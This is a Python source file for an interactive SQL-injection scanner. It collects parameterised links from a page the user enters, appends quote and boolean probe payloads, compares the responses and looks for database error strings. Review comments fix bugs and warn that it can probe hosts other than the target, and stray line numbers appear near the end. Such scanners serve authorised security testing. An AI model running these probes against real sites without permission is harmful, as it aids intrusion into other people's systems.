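import os
import re
import time

import requests
from bs4 import BeautifulSoup
from tqdm import tqdm


def zhuru():
    """Interactively probe one page's parameterised links for SQL-injection symptoms.

    Prompts for a URL, fetches it, and collects every ``href`` that contains
    ``php?``, ``asp?`` or ``jsp?``.  Each absolute link is then requested
    five times (unmodified, and with each of the four probe suffixes defined
    below) and the response bodies are compared.  Links judged injectable are
    appended to ``character.txt`` or ``injection.txt`` in the working
    directory.

    Returns nothing; results go to stdout and to the two report files.
    """
    # x, headers and ps are published as module globals, as before;
    # presumably for interactive inspection -- confirm before removing.
    global x, headers, ps

    user = input('[+]Please enter the URL you want to test:')  # site to check
    url = user.strip()  # drop surrounding whitespace
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
    # headers must be passed by keyword: the second positional parameter of
    # requests.get() is `params`, which would send the User-Agent as a query
    # string instead of as a header.  The timeout matches the probe requests.
    request = requests.get(url, headers=headers, timeout=6)

    gwd = BeautifulSoup(request.content, 'html.parser')
    php = gwd.find_all(href=re.compile(r'php\?'))  # links with a php? query
    asp = gwd.find_all(href=re.compile(r'asp\?'))  # links with an asp? query
    jsp = gwd.find_all(href=re.compile(r'jsp\?'))  # links with a jsp? query

    print('[+]Collection URL')
    for i in tqdm(range(1, 500)):  # cosmetic progress bar; does no work
        time.sleep(0.001)
    # Collected in the same order as before: php, then asp, then jsp.
    shoujiurl = [tag.get('href') for tag in (*php, *asp, *jsp)]
    print('[+]Collection completed')

    # Database / interpreter error fragments looked for in a response body.
    huixian = [
        "is not a valid MySQL result resource",
        "ODBC SQL Server Driver",
        "Warning:ociexecute",
        "Warning: pq_query[function.pg-query]",
        "You have an error in your SQL syntax",
        "Database Engine",
        "Undefined variable",
        "on line",
        "mysql_fetch_array():",
    ]

    payload0 = "'"
    payload1 = "''"
    payload2 = "%20and%201=1"
    payload3 = "%20and%201=2"

    # The character class was written `a-zA-z`, which also matches
    # `[ \ ] ^ _` and the backtick; `A-Z` is what a URL scheme needs.
    absolute_url = re.compile(r'[a-zA-Z]+://\S*')

    # NOTE(review): an href can point at any host, and nothing here limits
    # probing to the host the operator entered.  Consider comparing each
    # link's netloc with the target's before sending requests.
    for x in shoujiurl:
        found = absolute_url.search(x)
        if found is None:
            # Relative or fragmentary hrefs were previously dropped without a
            # trace (the empty URL raised inside a bare except); say so.
            print('[-]Skipped (not an absolute URL):', x)
            continue
        yuan = found.group(0)

        try:
            resg = requests.get(url=yuan + payload0, headers=headers, timeout=6)
            resg2 = requests.get(url=yuan + payload1, headers=headers, timeout=6)
            resg3 = requests.get(url=yuan, headers=headers, timeout=6)
            resg4 = requests.get(url=yuan + payload2, headers=headers, timeout=6)
            resg5 = requests.get(url=yuan + payload3, headers=headers, timeout=6)
        except requests.RequestException as exc:
            # Only network/HTTP-layer failures are tolerated; a bare except
            # also swallowed KeyboardInterrupt and genuine programming errors.
            print('[-]Request failed, skipping:', yuan, exc)
            continue

        if resg.status_code != 200:
            print('http_stode:', resg.status_code)
            print('[-]Sorry, I cant tell if there is an injection')
            continue

        print('[+]The first step is completed, and the goal is to be stable')
        time.sleep(1)

        # Byte-for-byte body comparison is noisy: pages that embed timestamps,
        # CSRF tokens or rotating content differ between any two requests, so
        # every hit below needs manual confirmation.
        if resg.content != resg2.content and resg3.content == resg2.content:
            # String-type parameter: one quote changes the page, two do not.
            print('[+]Existence of character injection')
            print(resg3.url)
            with open('character.txt', 'a') as report:  # close the handle
                print(resg3.url, file=report)
        elif resg4.content != resg5.content and resg4.content == resg3.content:
            # Numeric parameter: the true and false conditions render differently.
            print('[+]Digital injection')
            print(resg3.url)
            with open('injection.txt', 'a') as report:  # close the handle
                print(resg3.url, file=report)
        else:
            print('[+]Sorry, not character injection')
            print('[+]Sorry, not Digital injection')
            print(resg3.url)
            # Check every signature; previously only the last list entry was
            # ever compared, against the repr() of the raw bytes.
            # NOTE(review): the response inspected is still the doubled-quote
            # one (resg2), as before -- confirm that is the intended one.
            body = resg2.text
            for ps in huixian:
                if ps in body:
                    print('[+]The wrong sentence to be found', ps)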
103
104
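if __name__ == "__main__":
    # Start the interactive scan only when executed as a script, so that
    # importing this module does not prompt for input or send requests.
    zhuru()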